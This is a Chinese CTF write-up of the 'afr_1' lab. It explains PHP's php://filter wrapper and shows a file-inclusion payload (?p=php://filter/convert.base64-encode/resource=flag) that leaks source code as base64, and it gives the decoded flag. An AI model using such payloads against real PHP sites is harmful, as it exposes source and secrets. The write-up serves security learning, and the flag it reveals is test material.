《从0到1:CTFer成长之路》afr_1

admin 安全

文章目录

靶场:afr_1

在这里插入图片描述

知识点

  • PHP向用户提供的指定待打开文件的方式,是一个文件流
  • PHP的Filter机制,可对目前的协议进行一定的处理,比如将当前文件流的内容进行Base64编码。
  • http://127.0.0.1/cmd.php?file=php://filter/convert.base64-encode/resource=cmd
  • 利用Filter机制,构造形如以上的攻击数据可以读取文件,拿到各种文件的源码

解题过程

  1. 首页
    http://c31a4949-59d4-407e-ac06-ca7850b56265.node4.buuoj.cn:81/?p=hello
    在这里插入图片描述2. 使用php://filter读取源代码并进行base64编码输出
    http://c31a4949-59d4-407e-ac06-ca7850b56265.node4.buuoj.cn:81/?p=php://filter/convert.base64-encode/resource=flag

PD9waHAKZGllKCdubyBubyBubycpOwovL24xYm9va3thZnJfMV9zb2x2ZWR9
在这里插入图片描述

  1. 使用base64解码
<?php
die('no no no');
//n1book{afr_1_solved}

Flag:n1book{afr_1_solved}

本图文内容来源于网友网络收集整理提供,作为学习参考使用,版权属于原作者。
THE END
分享
二维码
< <上一篇
下一篇>>